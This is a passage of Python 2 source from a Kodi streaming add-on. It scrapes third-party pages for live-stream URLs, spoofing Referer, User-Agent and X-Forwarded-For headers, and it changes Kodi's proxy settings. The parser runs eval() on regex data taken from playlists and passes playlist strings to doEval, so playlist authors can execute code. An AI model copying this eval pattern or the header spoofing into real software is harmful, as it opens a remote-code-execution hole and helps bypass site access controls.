  869. #addDir(name.encode('utf-8'),url[0].encode('utf-8'),1,thumbnail,fanart,desc,genre,date,None,'source')
  870. elif isJsonrpc:
  871. addDir(name.encode('utf-8'),ext_url[0],53,thumbnail,fanArt,desc,genre,date,None,'source')
  872. #xbmc.executebuiltin("Container.SetViewMode(500)")
  873. else:
  874. try:
  875. if '$doregex' in name and not getRegexParsed==None:
  876.  
  877. tname,setres=getRegexParsed(regexs, name)
  878.  
  879. if not tname==None:
  880. name=tname
  881. except: pass
  882. try:
  883. if '$doregex' in thumbnail and not getRegexParsed==None:
  884. tname,setres=getRegexParsed(regexs, thumbnail)
  885. if not tname==None:
  886. thumbnail=tname
  887. except: pass
  888. addLink(url[0],name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total)
  889. #print 'success'
  890. except:
  891. addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore'))
  892.  
  893. def parse_regex(reg_item):
  894. try:
  895. regexs = {}
  896. for i in reg_item:
  897. regexs[i('name')[0].string] = {}
  898. regexs[i('name')[0].string]['name']=i('name')[0].string
  899. #regexs[i('name')[0].string]['expres'] = i('expres')[0].string
  900. try:
  901. regexs[i('name')[0].string]['expres'] = i('expres')[0].string
  902. if not regexs[i('name')[0].string]['expres']:
  903. regexs[i('name')[0].string]['expres']=''
  904. except:
  905. addon_log("Regex: -- No Referer --")
  906. regexs[i('name')[0].string]['page'] = i('page')[0].string
  907. try:
  908. regexs[i('name')[0].string]['referer'] = i('referer')[0].string
  909. except:
  910. addon_log("Regex: -- No Referer --")
  911. try:
  912. regexs[i('name')[0].string]['connection'] = i('connection')[0].string
  913. except:
  914. addon_log("Regex: -- No connection --")
  915.  
  916. try:
  917. regexs[i('name')[0].string]['notplayable'] = i('notplayable')[0].string
  918. except:
  919. addon_log("Regex: -- No notplayable --")
  920.  
  921. try:
  922. regexs[i('name')[0].string]['noredirect'] = i('noredirect')[0].string
  923. except:
  924. addon_log("Regex: -- No noredirect --")
  925. try:
  926. regexs[i('name')[0].string]['origin'] = i('origin')[0].string
  927. except:
  928. addon_log("Regex: -- No origin --")
  929. try:
  930. regexs[i('name')[0].string]['accept'] = i('accept')[0].string
  931. except:
  932. addon_log("Regex: -- No accept --")
  933. try:
  934. regexs[i('name')[0].string]['includeheaders'] = i('includeheaders')[0].string
  935. except:
  936. addon_log("Regex: -- No includeheaders --")
  937.  
  938.  
  939. try:
  940. regexs[i('name')[0].string]['listrepeat'] = i('listrepeat')[0].string
  941. # print 'listrepeat',regexs[i('name')[0].string]['listrepeat'],i('listrepeat')[0].string, i
  942. except:
  943. addon_log("Regex: -- No listrepeat --")
  944.  
  945.  
  946.  
  947. try:
  948. regexs[i('name')[0].string]['proxy'] = i('proxy')[0].string
  949. except:
  950. addon_log("Regex: -- No proxy --")
  951.  
  952. try:
  953. regexs[i('name')[0].string]['x-req'] = i('x-req')[0].string
  954. except:
  955. addon_log("Regex: -- No x-req --")
  956.  
  957. try:
  958. regexs[i('name')[0].string]['x-addr'] = i('x-addr')[0].string
  959. except:
  960. addon_log("Regex: -- No x-addr --")
  961.  
  962. try:
  963. regexs[i('name')[0].string]['x-forward'] = i('x-forward')[0].string
  964. except:
  965. addon_log("Regex: -- No x-forward --")
  966.  
  967. try:
  968. regexs[i('name')[0].string]['agent'] = i('agent')[0].string
  969. except:
  970. addon_log("Regex: -- No User Agent --")
  971. try:
  972. regexs[i('name')[0].string]['post'] = i('post')[0].string
  973. except:
  974. addon_log("Regex: -- Not a post")
  975. try:
  976. regexs[i('name')[0].string]['rawpost'] = i('rawpost')[0].string
  977. except:
  978. addon_log("Regex: -- Not a rawpost")
  979. try:
  980. regexs[i('name')[0].string]['htmlunescape'] = i('htmlunescape')[0].string
  981. except:
  982. addon_log("Regex: -- Not a htmlunescape")
  983.  
  984.  
  985. try:
  986. regexs[i('name')[0].string]['readcookieonly'] = i('readcookieonly')[0].string
  987. except:
  988. addon_log("Regex: -- Not a readCookieOnly")
  989. #print i
  990. try:
  991. regexs[i('name')[0].string]['cookiejar'] = i('cookiejar')[0].string
  992. if not regexs[i('name')[0].string]['cookiejar']:
  993. regexs[i('name')[0].string]['cookiejar']=''
  994. except:
  995. addon_log("Regex: -- Not a cookieJar")
  996. try:
  997. regexs[i('name')[0].string]['setcookie'] = i('setcookie')[0].string
  998. except:
  999. addon_log("Regex: -- Not a setcookie")
  1000. try:
  1001. regexs[i('name')[0].string]['appendcookie'] = i('appendcookie')[0].string
  1002. except:
  1003. addon_log("Regex: -- Not a appendcookie")
  1004.  
  1005. try:
  1006. regexs[i('name')[0].string]['ignorecache'] = i('ignorecache')[0].string
  1007. except:
  1008. addon_log("Regex: -- no ignorecache")
  1009. #try:
  1010. # regexs[i('name')[0].string]['ignorecache'] = i('ignorecache')[0].string
  1011. #except:
  1012. # addon_log("Regex: -- no ignorecache")
  1013.  
  1014. regexs = urllib.quote(repr(regexs))
  1015. return regexs
  1016. #print regexs
  1017. except:
  1018. regexs = None
  1019. addon_log('regex Error: '+name.encode('utf-8', 'ignore'))
  1020. #copies from lamda's implementation
  1021. def get_ustream(url):
  1022. try:
  1023. for i in range(1, 51):
  1024. result = getUrl(url)
  1025. if "EXT-X-STREAM-INF" in result: return url
  1026. if not "EXTM3U" in result: return
  1027. xbmc.sleep(2000)
  1028. return
  1029. except:
  1030. return
  1031.  
  1032. def getRegexParsed(regexs, url,cookieJar=None,forCookieJarOnly=False,recursiveCall=False,cachedPages={}, rawPost=False, cookie_jar_file=None):#0,1,2 = URL, regexOnly, CookieJarOnly
  1033. if not recursiveCall:
  1034. regexs = eval(urllib.unquote(regexs))
  1035. #cachedPages = {}
  1036. #print 'url',url
  1037. doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url)
  1038. # print 'doRegexs',doRegexs,regexs
  1039. setresolved=True
  1040. for k in doRegexs:
  1041. if k in regexs:
  1042. #print 'processing ' ,k
  1043. m = regexs[k]
  1044. #print m
  1045. cookieJarParam=False
  1046. if 'cookiejar' in m: # so either create or reuse existing jar
  1047. #print 'cookiejar exists',m['cookiejar']
  1048. cookieJarParam=m['cookiejar']
  1049. if '$doregex' in cookieJarParam:
  1050. cookieJar=getRegexParsed(regexs, m['cookiejar'],cookieJar,True, True,cachedPages)
  1051.  
  1052. cookieJarParam=True
  1053. else:
  1054. cookieJarParam=True
  1055. #print 'm[cookiejar]',m['cookiejar'],cookieJar
  1056. if cookieJarParam:
  1057. if cookieJar==None:
  1058. #print 'create cookie jar'
  1059. cookie_jar_file=None
  1060. if 'open[' in m['cookiejar']:
  1061. cookie_jar_file=m['cookiejar'].split('open[')[1].split(']')[0]
  1062. # print 'cookieJar from file name',cookie_jar_file
  1063.  
  1064. cookieJar=getCookieJar(cookie_jar_file)
  1065. # print 'cookieJar from file',cookieJar
  1066. if cookie_jar_file:
  1067. saveCookieJar(cookieJar,cookie_jar_file)
  1068. #import cookielib
  1069. #cookieJar = cookielib.LWPCookieJar()
  1070. #print 'cookieJar new',cookieJar
  1071. elif 'save[' in m['cookiejar']:
  1072. cookie_jar_file=m['cookiejar'].split('save[')[1].split(']')[0]
  1073. complete_path=os.path.join(profile,cookie_jar_file)
  1074. # print 'complete_path',complete_path
  1075. saveCookieJar(cookieJar,cookie_jar_file)
  1076. if m['page'] and '$doregex' in m['page']:
  1077. pg=getRegexParsed(regexs, m['page'],cookieJar,recursiveCall=True,cachedPages=cachedPages)
  1078. if len(pg)==0:
  1079. pg='http://regexfailed'
  1080. m['page']=pg
  1081.  
  1082. if 'setcookie' in m and m['setcookie'] and '$doregex' in m['setcookie']:
  1083. m['setcookie']=getRegexParsed(regexs, m['setcookie'],cookieJar,recursiveCall=True,cachedPages=cachedPages)
  1084. if 'appendcookie' in m and m['appendcookie'] and '$doregex' in m['appendcookie']:
  1085. m['appendcookie']=getRegexParsed(regexs, m['appendcookie'],cookieJar,recursiveCall=True,cachedPages=cachedPages)
  1086.  
  1087.  
  1088. if 'post' in m and '$doregex' in m['post']:
  1089. m['post']=getRegexParsed(regexs, m['post'],cookieJar,recursiveCall=True,cachedPages=cachedPages)
  1090. # print 'post is now',m['post']
  1091.  
  1092. if 'rawpost' in m and '$doregex' in m['rawpost']:
  1093. m['rawpost']=getRegexParsed(regexs, m['rawpost'],cookieJar,recursiveCall=True,cachedPages=cachedPages,rawPost=True)
  1094. #print 'rawpost is now',m['rawpost']
  1095.  
  1096. if 'rawpost' in m and '$epoctime$' in m['rawpost']:
  1097. m['rawpost']=m['rawpost'].replace('$epoctime$',getEpocTime())
  1098.  
  1099. if 'rawpost' in m and '$epoctime2$' in m['rawpost']:
  1100. m['rawpost']=m['rawpost'].replace('$epoctime2$',getEpocTime2())
  1101.  
  1102.  
  1103. link=''
  1104. if m['page'] and m['page'] in cachedPages and not 'ignorecache' in m and forCookieJarOnly==False :
  1105. #print 'using cache page',m['page']
  1106. link = cachedPages[m['page']]
  1107. else:
  1108. if m['page'] and not m['page']=='' and m['page'].startswith('http'):
  1109. if '$epoctime$' in m['page']:
  1110. m['page']=m['page'].replace('$epoctime$',getEpocTime())
  1111. if '$epoctime2$' in m['page']:
  1112. m['page']=m['page'].replace('$epoctime2$',getEpocTime2())
  1113.  
  1114. #print 'Ingoring Cache',m['page']
  1115. page_split=m['page'].split('|')
  1116. pageUrl=page_split[0]
  1117. header_in_page=None
  1118. if len(page_split)>1:
  1119. header_in_page=page_split[1]
  1120.  
  1121. # if
  1122. # proxy = urllib2.ProxyHandler({ ('https' ? proxytouse[:5]=="https":"http") : proxytouse})
  1123. # opener = urllib2.build_opener(proxy)
  1124. # urllib2.install_opener(opener)
  1125.  
  1126.  
  1127.  
  1128. # import urllib2
  1129. # print 'urllib2.getproxies',urllib2.getproxies()
  1130. current_proxies=urllib2.ProxyHandler(urllib2.getproxies())
  1131.  
  1132.  
  1133. #print 'getting pageUrl',pageUrl
  1134. req = urllib2.Request(pageUrl)
  1135. if 'proxy' in m:
  1136. proxytouse= m['proxy']
  1137. # print 'proxytouse',proxytouse
  1138. # urllib2.getproxies= lambda: {}
  1139. if pageUrl[:5]=="https":
  1140. proxy = urllib2.ProxyHandler({ 'https' : proxytouse})
  1141. #req.set_proxy(proxytouse, 'https')
  1142. else:
  1143. proxy = urllib2.ProxyHandler({ 'http' : proxytouse})
  1144. #req.set_proxy(proxytouse, 'http')
  1145. opener = urllib2.build_opener(proxy)
  1146. urllib2.install_opener(opener)
  1147.  
  1148.  
  1149. req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1')
  1150. proxytouse=None
  1151.  
  1152. if 'referer' in m:
  1153. req.add_header('Referer', m['referer'])
  1154. if 'accept' in m:
  1155. req.add_header('Accept', m['accept'])
  1156. if 'agent' in m:
  1157. req.add_header('User-agent', m['agent'])
  1158. if 'x-req' in m:
  1159. req.add_header('X-Requested-With', m['x-req'])
  1160. if 'x-addr' in m:
  1161. req.add_header('x-addr', m['x-addr'])
  1162. if 'x-forward' in m:
  1163. req.add_header('X-Forwarded-For', m['x-forward'])
  1164. if 'setcookie' in m:
  1165. # print 'adding cookie',m['setcookie']
  1166. req.add_header('Cookie', m['setcookie'])
  1167. if 'appendcookie' in m:
  1168. # print 'appending cookie to cookiejar',m['appendcookie']
  1169. cookiestoApend=m['appendcookie']
  1170. cookiestoApend=cookiestoApend.split(';')
  1171. for h in cookiestoApend:
  1172. n,v=h.split('=')
  1173. w,n= n.split(':')
  1174. ck = cookielib.Cookie(version=0, name=n, value=v, port=None, port_specified=False, domain=w, domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={'HttpOnly': None}, rfc2109=False)
  1175. cookieJar.set_cookie(ck)
  1176. if 'origin' in m:
  1177. req.add_header('Origin', m['origin'])
  1178. if header_in_page:
  1179. header_in_page=header_in_page.split('&')
  1180. for h in header_in_page:
  1181. if h.split('=')==2:
  1182. n,v=h.split('=')
  1183. else:
  1184. vals=h.split('=')
  1185. n=vals[0]
  1186. v='='.join(vals[1:])
  1187. #n,v=h.split('=')
  1188. req.add_header(n,v)
  1189.  
  1190. if not cookieJar==None:
  1191. # print 'cookieJarVal',cookieJar
  1192. cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
  1193. opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
  1194. opener = urllib2.install_opener(opener)
  1195. # print 'noredirect','noredirect' in m
  1196.  
  1197. if 'noredirect' in m:
  1198. opener = urllib2.build_opener(cookie_handler,NoRedirection, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
  1199. opener = urllib2.install_opener(opener)
  1200. elif 'noredirect' in m:
  1201. opener = urllib2.build_opener(NoRedirection, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
  1202. opener = urllib2.install_opener(opener)
  1203.  
  1204.  
  1205. if 'connection' in m:
  1206. # print '..........................connection//////.',m['connection']
  1207. from keepalive import HTTPHandler
  1208. keepalive_handler = HTTPHandler()
  1209. opener = urllib2.build_opener(keepalive_handler)
  1210. urllib2.install_opener(opener)
  1211.  
  1212.  
  1213. #print 'after cookie jar'
  1214. post=None
  1215.  
  1216. if 'post' in m:
  1217. postData=m['post']
  1218. #if '$LiveStreamRecaptcha' in postData:
  1219. # (captcha_challenge,catpcha_word,idfield)=processRecaptcha(m['page'],cookieJar)
  1220. # if captcha_challenge:
  1221. # postData=postData.replace('$LiveStreamRecaptcha','manual_recaptcha_challenge_field:'+captcha_challenge+',recaptcha_response_field:'+catpcha_word+',id:'+idfield)
  1222. splitpost=postData.split(',');
  1223. post={}
  1224. for p in splitpost:
  1225. n=p.split(':')[0];
  1226. v=p.split(':')[1];
  1227. post[n]=v
  1228. post = urllib.urlencode(post)
  1229.  
  1230. if 'rawpost' in m:
  1231. post=m['rawpost']
  1232. #if '$LiveStreamRecaptcha' in post:
  1233. # (captcha_challenge,catpcha_word,idfield)=processRecaptcha(m['page'],cookieJar)
  1234. # if captcha_challenge:
  1235. # post=post.replace('$LiveStreamRecaptcha','&manual_recaptcha_challenge_field='+captcha_challenge+'&recaptcha_response_field='+catpcha_word+'&id='+idfield)
  1236. link=''
  1237. try:
  1238.  
  1239. if post:
  1240. response = urllib2.urlopen(req,post)
  1241. else:
  1242. response = urllib2.urlopen(req)
  1243. if response.info().get('Content-Encoding') == 'gzip':
  1244. from StringIO import StringIO
  1245. import gzip
  1246. buf = StringIO( response.read())
  1247. f = gzip.GzipFile(fileobj=buf)
  1248. link = f.read()
  1249. else:
  1250. link=response.read()
  1251.  
  1252.  
  1253.  
  1254. if 'proxy' in m and not current_proxies is None:
  1255. urllib2.install_opener(urllib2.build_opener(current_proxies))
  1256.  
  1257. link=javascriptUnEscape(link)
  1258. #print repr(link)
  1259. #print link This just print whole webpage in LOG
  1260. if 'includeheaders' in m:
  1261. #link+=str(response.headers.get('Set-Cookie'))
  1262. link+='$$HEADERS_START$$:'
  1263. for b in response.headers:
  1264. link+= b+':'+response.headers.get(b)+'\n'
  1265. link+='$$HEADERS_END$$:'
  1266. # print link
  1267. addon_log(link)
  1268. addon_log(cookieJar )
  1269.  
  1270. response.close()
  1271. except:
  1272. pass
  1273. cachedPages[m['page']] = link
  1274. #print link
  1275. #print 'store link for',m['page'],forCookieJarOnly
  1276.  
  1277. if forCookieJarOnly:
  1278. return cookieJar# do nothing
  1279. elif m['page'] and not m['page'].startswith('http'):
  1280. if m['page'].startswith('$pyFunction:'):
  1281. val=doEval(m['page'].split('$pyFunction:')[1],'',cookieJar,m )
  1282. if forCookieJarOnly:
  1283. return cookieJar# do nothing
  1284. link=val
  1285. link=javascriptUnEscape(link)
  1286. else:
  1287. link=m['page']
  1288. if '$pyFunction:playmedia(' in m['expres'] or 'ActivateWindow' in m['expres'] or 'RunPlugin' in m['expres'] or '$PLAYERPROXY$=' in url or any(x in url for x in g_ignoreSetResolved):
  1289. setresolved=False
  1290. if '$doregex' in m['expres']:
  1291. m['expres']=getRegexParsed(regexs, m['expres'],cookieJar,recursiveCall=True,cachedPages=cachedPages)
  1292.  
  1293. if not m['expres']=='':
  1294. #print 'doing it ',m['expres']
  1295. if '$LiveStreamCaptcha' in m['expres']:
  1296. val=askCaptcha(m,link,cookieJar)
  1297. #print 'url and val',url,val
  1298. url = url.replace("$doregex[" + k + "]", val)
  1299.  
  1300. elif m['expres'].startswith('$pyFunction:') or '#$pyFunction' in m['expres']:
  1301. #print 'expeeeeeeeeeeeeeeeeeee',m['expres']
  1302. val=''
  1303. if m['expres'].startswith('$pyFunction:'):
  1304. val=doEval(m['expres'].split('$pyFunction:')[1],link,cookieJar,m)
  1305. else:
  1306. val=doEvalFunction(m['expres'],link,cookieJar,m)
  1307. if 'ActivateWindow' in m['expres'] or 'RunPlugin' in m['expres'] : return '',False
  1308. if forCookieJarOnly:
  1309. return cookieJar# do nothing
  1310. if 'listrepeat' in m:
  1311. listrepeat=m['listrepeat']
  1312. #ret=re.findall(m['expres'],link)
  1313. #print 'ret',val
  1314. return listrepeat,eval(val), m,regexs,cookieJar
  1315. # print 'url k val',url,k,val
  1316. #print 'repr',repr(val)
  1317.  
  1318. try:
  1319. url = url.replace(u"$doregex[" + k + "]", val)
  1320. except: url = url.replace("$doregex[" + k + "]", val.decode("utf-8"))
  1321. else:
  1322. if 'listrepeat' in m:
  1323. listrepeat=m['listrepeat']
  1324. #print 'listrepeat',m['expres']
  1325. #print m['expres']
  1326. #print 'aaaa'
  1327. #print link
  1328. ret=re.findall(m['expres'],link)
  1329. #print 'ret',ret
  1330. return listrepeat,ret, m,regexs,cookieJar
  1331.  
  1332. val=''
  1333. if not link=='':
  1334. #print 'link',link
  1335. reg = re.compile(m['expres']).search(link)
  1336. try:
  1337. val=reg.group(1).strip()
  1338. except: traceback.print_exc()
  1339. elif m['page']=='' or m['page']==None:
  1340. val=m['expres']
  1341.  
  1342. if rawPost:
  1343. # print 'rawpost'
  1344. val=urllib.quote_plus(val)
  1345. if 'htmlunescape' in m:
  1346. #val=urllib.unquote_plus(val)
  1347. import HTMLParser
  1348. val=HTMLParser.HTMLParser().unescape(val)
  1349. try:
  1350. url = url.replace("$doregex[" + k + "]", val)
  1351. except: url = url.replace("$doregex[" + k + "]", val.decode("utf-8"))
  1352. #print 'ur',url
  1353. #return val
  1354. else:
  1355. url = url.replace("$doregex[" + k + "]",'')
  1356. if '$epoctime$' in url:
  1357. url=url.replace('$epoctime$',getEpocTime())
  1358. if '$epoctime2$' in url:
  1359. url=url.replace('$epoctime2$',getEpocTime2())
  1360.  
  1361. if '$GUID$' in url:
  1362. import uuid
  1363. url=url.replace('$GUID$',str(uuid.uuid1()).upper())
  1364. if '$get_cookies$' in url:
  1365. url=url.replace('$get_cookies$',getCookiesString(cookieJar))
  1366.  
  1367. if recursiveCall: return url
  1368. #print 'final url',repr(url)
  1369. if url=="":
  1370. return
  1371. else:
  1372. return url,setresolved
  1373. def getmd5(t):
  1374. import hashlib
  1375. h=hashlib.md5()
  1376. h.update(t)
  1377. return h.hexdigest()
  1378.  
  1379. def decrypt_vaughnlive(encrypted):
  1380. retVal=""
  1381. # print 'enc',encrypted
  1382. #for val in encrypted.split(':'):
  1383. # retVal+=chr(int(val.replace("0m0","")))
  1384. #return retVal
  1385.  
  1386. def playmedia(media_url):
  1387. try:
  1388. import CustomPlayer
  1389. player = CustomPlayer.MyXBMCPlayer()
  1390. listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=media_url )
  1391. player.play( media_url,listitem)
  1392. xbmc.sleep(1000)
  1393. while player.is_active:
  1394. xbmc.sleep(200)
  1395. except:
  1396. traceback.print_exc()
  1397. return ''
  1398.  
  1399. def kodiJsonRequest(params):
  1400. data = json.dumps(params)
  1401. request = xbmc.executeJSONRPC(data)
  1402.  
  1403. try:
  1404. response = json.loads(request)
  1405. except UnicodeDecodeError:
  1406. response = json.loads(request.decode('utf-8', 'ignore'))
  1407.  
  1408. try:
  1409. if 'result' in response:
  1410. return response['result']
  1411. return None
  1412. except KeyError:
  1413. logger.warn("[%s] %s" % (params['method'], response['error']['message']))
  1414. return None
  1415.  
  1416.  
  1417. def setKodiProxy(proxysettings=None):
  1418.  
  1419. if proxysettings==None:
  1420. # print 'proxy set to nothing'
  1421. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.usehttpproxy", "value":false}, "id":1}')
  1422. else:
  1423.  
  1424. ps=proxysettings.split(':')
  1425. proxyURL=ps[0]
  1426. proxyPort=ps[1]
  1427. proxyType=ps[2]
  1428. proxyUsername=None
  1429. proxyPassword=None
  1430.  
  1431. if len(ps)>3 and '@' in ps[3]: #jairox ###proxysettings
  1432. proxyUsername=ps[3].split('@')[0] #jairox ###ps[3]
  1433. proxyPassword=ps[3].split('@')[1] #jairox ###proxysettings.split('@')[-1]
  1434.  
  1435. # print 'proxy set to', proxyType, proxyURL,proxyPort
  1436. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.usehttpproxy", "value":true}, "id":1}')
  1437. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.httpproxytype", "value":' + str(proxyType) +'}, "id":1}')
  1438. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.httpproxyserver", "value":"' + str(proxyURL) +'"}, "id":1}')
  1439. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.httpproxyport", "value":' + str(proxyPort) +'}, "id":1}')
  1440.  
  1441.  
  1442. if not proxyUsername==None:
  1443. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.httpproxyusername", "value":"' + str(proxyUsername) +'"}, "id":1}')
  1444. xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue", "params":{"setting":"network.httpproxypassword", "value":"' + str(proxyPassword) +'"}, "id":1}')
  1445.  
  1446.  
  1447. def getConfiguredProxy():
  1448. proxyActive = kodiJsonRequest({'jsonrpc': '2.0', "method":"Settings.GetSettingValue", "params":{"setting":"network.usehttpproxy"}, 'id': 1})['value']
  1449. # print 'proxyActive',proxyActive
  1450. proxyType = kodiJsonRequest({'jsonrpc': '2.0', "method":"Settings.GetSettingValue", "params":{"setting":"network.httpproxytype"}, 'id': 1})['value']
  1451.  
  1452. if proxyActive: # PROXY_HTTP
  1453. proxyURL = kodiJsonRequest({'jsonrpc': '2.0', "method":"Settings.GetSettingValue", "params":{"setting":"network.httpproxyserver"}, 'id': 1})['value']
  1454. proxyPort = unicode(kodiJsonRequest({'jsonrpc': '2.0', "method":"Settings.GetSettingValue", "params":{"setting":"network.httpproxyport"}, 'id': 1})['value'])
  1455. proxyUsername = kodiJsonRequest({'jsonrpc': '2.0', "method":"Settings.GetSettingValue", "params":{"setting":"network.httpproxyusername"}, 'id': 1})['value']
  1456. proxyPassword = kodiJsonRequest({'jsonrpc': '2.0', "method":"Settings.GetSettingValue", "params":{"setting":"network.httpproxypassword"}, 'id': 1})['value']
  1457.  
  1458. if proxyUsername and proxyPassword and proxyURL and proxyPort:
  1459. return proxyURL + ':' + str(proxyPort)+':'+str(proxyType) + ':' + proxyUsername + '@' + proxyPassword
  1460. elif proxyURL and proxyPort:
  1461. return proxyURL + ':' + str(proxyPort)+':'+str(proxyType)
  1462. else:
  1463. return None
  1464.  
  1465. def playmediawithproxy(media_url, name, iconImage,proxyip,port, proxyuser=None, proxypass=None): #jairox
  1466.  
  1467. if media_url==None or media_url=='':
  1468. xbmc.executebuiltin("XBMC.Notification(CocinaTu,Unable to play empty Url,5000,"+icon+")")
  1469. return
  1470. progress = xbmcgui.DialogProgress()
  1471. progress.create('Progress', 'Playing with custom proxy')
  1472. progress.update( 10, "", "setting proxy..", "" )
  1473. proxyset=False
  1474. existing_proxy=''
  1475. #print 'playmediawithproxy'
  1476. try:
  1477.  
  1478. existing_proxy=getConfiguredProxy()
  1479. print 'existing_proxy',existing_proxy
  1480. #read and set here
  1481. #jairox
  1482. if not proxyuser == None:
  1483. setKodiProxy( proxyip + ':' + port + ':0:' + proxyuser + '@' + proxypass)
  1484. else:
  1485. setKodiProxy( proxyip + ':' + port + ':0')
  1486.  
  1487. print 'proxy setting complete playing',media_url
  1488. proxyset=True
  1489. progress.update( 80, "", "setting proxy complete, now playing", "" )
  1490.  
  1491.  
  1492. import CustomPlayer
  1493. player = CustomPlayer.MyXBMCPlayer()
  1494. player.pdialogue==progress
  1495. listitem = xbmcgui.ListItem( label = str(name), iconImage = iconImage, thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=media_url )
  1496. player.play( media_url,listitem)
  1497. xbmc.sleep(1000)
  1498. #while player.is_active:
  1499. # xbmc.sleep(200)
  1500. import time
  1501. beforestart=time.time()
  1502. try:
  1503. while player.is_active:
  1504. xbmc.sleep(1000)
  1505. if player.urlplayed==False and time.time()-beforestart>12:
  1506. print 'failed!!!'
  1507. xbmc.executebuiltin("XBMC.Notification(CocinaTu,Unable to play check proxy,5000,"+icon+")")
  1508. break
  1509. #xbmc.sleep(1000)
  1510. except: pass
  1511.  
  1512. progress.close()
  1513. progress=None
  1514. except:
  1515. traceback.print_exc()
  1516. if progress:
  1517. progress.close()
  1518. if proxyset:
  1519. print 'now resetting the proxy back'
  1520. setKodiProxy(existing_proxy)
  1521. print 'reset here'
  1522. return ''
  1523.  
  1524.  
  1525. def get_saw_rtmp(page_value, referer=None):
  1526. if referer:
  1527. referer=[('Referer',referer)]
  1528. if page_value.startswith("http"):
  1529. page_url=page_value
  1530. page_value= getUrl(page_value,headers=referer)
  1531.  
  1532. str_pattern="(eval\(function\(p,a,c,k,e,(?:r|d).*)"
  1533.  
  1534. reg_res=re.compile(str_pattern).findall(page_value)
  1535. r=""
  1536. if reg_res and len(reg_res)>0:
  1537. for v in reg_res:
  1538. r1=get_unpacked(v)
  1539. r2=re_me(r1,'\'(.*?)\'')
  1540. if 'unescape' in r1:
  1541. r1=urllib.unquote(r2)
  1542. r+=r1+'\n'
  1543. # print 'final value is ',r
  1544.  
  1545. page_url=re_me(r,'src="(.*?)"')
  1546.  
  1547. page_value= getUrl(page_url,headers=referer)
  1548.  
  1549. #print page_value
  1550.  
  1551. rtmp=re_me(page_value,'streamer\'.*?\'(.*?)\'\)')
  1552. playpath=re_me(page_value,'file\',\s\'(.*?)\'')
  1553.  
  1554.  
  1555. return rtmp+' playpath='+playpath +' pageUrl='+page_url
  1556.  
  1557. def get_leton_rtmp(page_value, referer=None):
  1558. if referer:
  1559. referer=[('Referer',referer)]
  1560. if page_value.startswith("http"):
  1561. page_value= getUrl(page_value,headers=referer)
  1562. str_pattern="var a = (.*?);\s*var b = (.*?);\s*var c = (.*?);\s*var d = (.*?);\s*var f = (.*?);\s*var v_part = '(.*?)';"
  1563. reg_res=re.compile(str_pattern).findall(page_value)[0]
  1564.  
  1565. a,b,c,d,f,v=(reg_res)
  1566. f=int(f)
  1567. a=int(a)/f
  1568. b=int(b)/f
  1569. c=int(c)/f
  1570. d=int(d)/f
  1571.  
  1572. ret= 'rtmp://' + str(a) + '.' + str(b) + '.' + str(c) + '.' + str(d) + v;
  1573. return ret
  1574.  
  1575. def createM3uForDash(url,useragent=None):
  1576. str='#EXTM3U'
  1577. str+='\n#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=361816'
  1578. str+='\n'+url+'&bytes=0-200000'#+'|User-Agent='+useragent
  1579. source_file = os.path.join(profile, 'testfile.m3u')
  1580. str+='\n'
  1581. SaveToFile(source_file,str)
  1582. #return 'C:/Users/shani/Downloads/test.m3u8'
  1583. return source_file
  1584.  
  1585. def SaveToFile(file_name,page_data,append=False):
  1586. if append:
  1587. f = open(file_name, 'a')
  1588. f.write(page_data)
  1589. f.close()
  1590. else:
  1591. f=open(file_name,'wb')
  1592. f.write(page_data)
  1593. f.close()
  1594. return ''
  1595.  
  1596. def LoadFile(file_name):
  1597. f=open(file_name,'rb')
  1598. d=f.read()
  1599. f.close()
  1600. return d
  1601.  
  1602. def get_packed_iphonetv_url(page_data):
  1603. import re,base64,urllib;
  1604. s=page_data
  1605. while 'geh(' in s:
  1606. if s.startswith('lol('): s=s[5:-1]
  1607. # print 's is ',s
  1608. s=re.compile('"(.*?)"').findall(s)[0];
  1609. s= base64.b64decode(s);
  1610. s=urllib.unquote(s);
  1611. print s
  1612. return s
  1613.  
  1614. def get_ferrari_url(page_data):
  1615. # print 'get_dag_url2',page_data
  1616. page_data2=getUrl(page_data);
  1617. patt='(http.*)'
  1618. import uuid
  1619. playback=str(uuid.uuid1()).upper()
  1620. links=re.compile(patt).findall(page_data2)
  1621. headers=[('X-Playback-Session-Id',playback)]
  1622. for l in links:
  1623. try:
  1624. page_datatemp=getUrl(l,headers=headers);
  1625.  
  1626. except: pass
  1627.  
  1628. return page_data+'|&X-Playback-Session-Id='+playback
  1629.  
  1630.  
  1631. def get_dag_url(page_data):
  1632. # print 'get_dag_url',page_data
  1633. if page_data.startswith('http://dag.total-stream.net'):
  1634. headers=[('User-Agent','Verismo-BlackUI_(2.4.7.5.8.0.34)')]
  1635. page_data=getUrl(page_data,headers=headers);
  1636.  
  1637. if '127.0.0.1' in page_data:
  1638. return revist_dag(page_data)
  1639. elif re_me(page_data, 'wmsAuthSign%3D([^%&]+)') != '':
